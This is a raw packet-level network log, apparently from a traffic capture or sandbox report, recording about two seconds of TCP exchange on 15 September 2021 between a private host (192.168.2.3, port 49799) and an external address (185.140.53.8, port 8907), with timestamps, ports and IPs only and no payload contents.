Sep 15, 2021 06:15:24.525614023 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:24.702069998 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:24.704402924 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:24.978558064 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:24.979268074 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:24.979424953 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.169269085 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.170253038 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.170361042 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.179059029 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.185189009 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.189270020 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.357189894 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.358211040 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.358282089 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.358289003 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.358330011 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.359262943 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.367147923 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.368109941 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.368149996 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.368176937 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.368972063 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.369256973 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.546297073 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.547099113 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.548134089 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.548276901 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.548280954 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.549191952 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.549284935 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.549284935 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.549340010 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.549350977 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.555134058 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.555264950 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.556112051 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.556229115 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.557110071 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.557172060 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.557249069 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.558001041 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.559180021 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.559242964 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.559273958 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.560080051 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.560164928 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.732270002 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.733102083 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.733196020 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.734051943 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.734107018 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.734214067 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.735066891 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.735133886 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.735337019 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.735992908 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.737133026 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.737183094 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.737219095 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.738050938 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.738091946 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.738121033 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.739032030 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.739100933 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.739165068 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.749138117 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749234915 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749290943 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749294043 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.749419928 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749473095 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749495983 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.749541044 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.749557972 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749615908 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749672890 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749732018 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749773979 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.749789000 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.749808073 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749937057 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.749974012 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.750078917 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.750155926 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.750220060 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.750966072 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.751032114 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.751157045 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.752150059 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.752243042 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.752980947 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.753035069 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.753300905 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.920157909 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.921053886 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.921077967 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.921328068 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.921946049 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.922040939 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.922113895 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.931086063 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931128025 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931164026 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931237936 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.931289911 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931343079 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931435108 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.931498051 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931581020 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931629896 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931648016 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.931670904 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.931735039 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.932142973 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.932176113 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.932231903 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.933105946 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.933214903 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.933299065 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.934065104 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.936074018 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.936117887 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.936137915 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.937084913 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.937180042 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.937308073 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.938034058 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.938066006 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.938141108 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.939065933 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.939125061 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.940119982 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.940159082 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.941304922 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.942111015 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.944061041 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.944118977 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.945180893 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.945236921 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.945300102 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.946037054 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.946094990 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.946099997 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.946999073 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.947105885 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.948044062 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.948123932 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.949160099 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.949317932 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.949661016 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.950084925 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.950133085 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.950337887 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.952125072 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.953021049 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.953052998 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.953089952 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.953120947 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.953305960 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.954015970 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.955184937 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.955233097 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.955370903 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.955982924 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.956022978 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.956084013 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.957144976 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.957214117 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:25.957220078 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.958072901 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:25.958213091 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.100219965 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.101126909 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.101217985 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.102212906 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.102287054 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.103037119 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.104074001 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.108139992 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.108891010 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.109216928 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.109258890 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.109327078 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.111181021 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.111221075 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.111299992 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.112035990 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121119022 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121181965 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.121189117 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121268988 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121321917 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121345043 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.121397018 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121448994 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121624947 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121669054 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121684074 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.121763945 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121802092 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121815920 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.121853113 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.121903896 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.121957064 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.122013092 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.122064114 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.122208118 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.122262955 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.122298956 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.122318029 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.122992992 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.123080969 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.123765945 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.124066114 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.124460936 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.125107050 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.125147104 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.125237942 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.126395941 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.126435995 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.126493931 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.135195017 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.135246038 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.135305882 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.135601997 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.135673046 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.135727882 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.135763884 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.135806084 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.135828972 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.135874987 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.135955095 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.136015892 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.136056900 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.136101007 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.136113882 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.136195898 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.136248112 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.136250973 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.136300087 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.136349916 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.136359930 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.136987925 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.137089968 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.137319088 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.138186932 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.138797998 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.139107943 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.140151978 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.141319990 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.285269976 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.308268070 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.308535099 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.318185091 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.319216013 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.319323063 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.319448948 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.320128918 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.320226908 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.321142912 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.321361065 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.321516037 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.322365999 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.322516918 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.322612047 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.323178053 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.332257986 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.332329035 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333091974 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333136082 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.333195925 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.333296061 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333345890 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333437920 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.333544016 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333600044 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333647013 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333684921 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.333758116 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333798885 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333844900 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.333853960 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.333936930 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.334001064 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.334122896 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.334176064 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.334209919 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.335061073 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.335150003 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.335208893 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.336177111 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.336273909 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.337146997 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.337187052 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.337270975 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.338131905 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.339279890 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.339324951 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.339370012 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.340209961 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.340308905 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.340316057 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.341140985 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.341231108 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.342087984 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.342144012 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.342238903 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.343097925 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.344136953 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.344255924 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.344259977 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.345084906 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.345185995 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.345238924 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.346096039 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.346205950 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.347068071 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.347161055 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.347243071 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.348140001 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.349091053 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.349145889 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.349196911 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.350260973 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.350302935 CEST	8907	49799	185.140.53.8	192.168.2.3
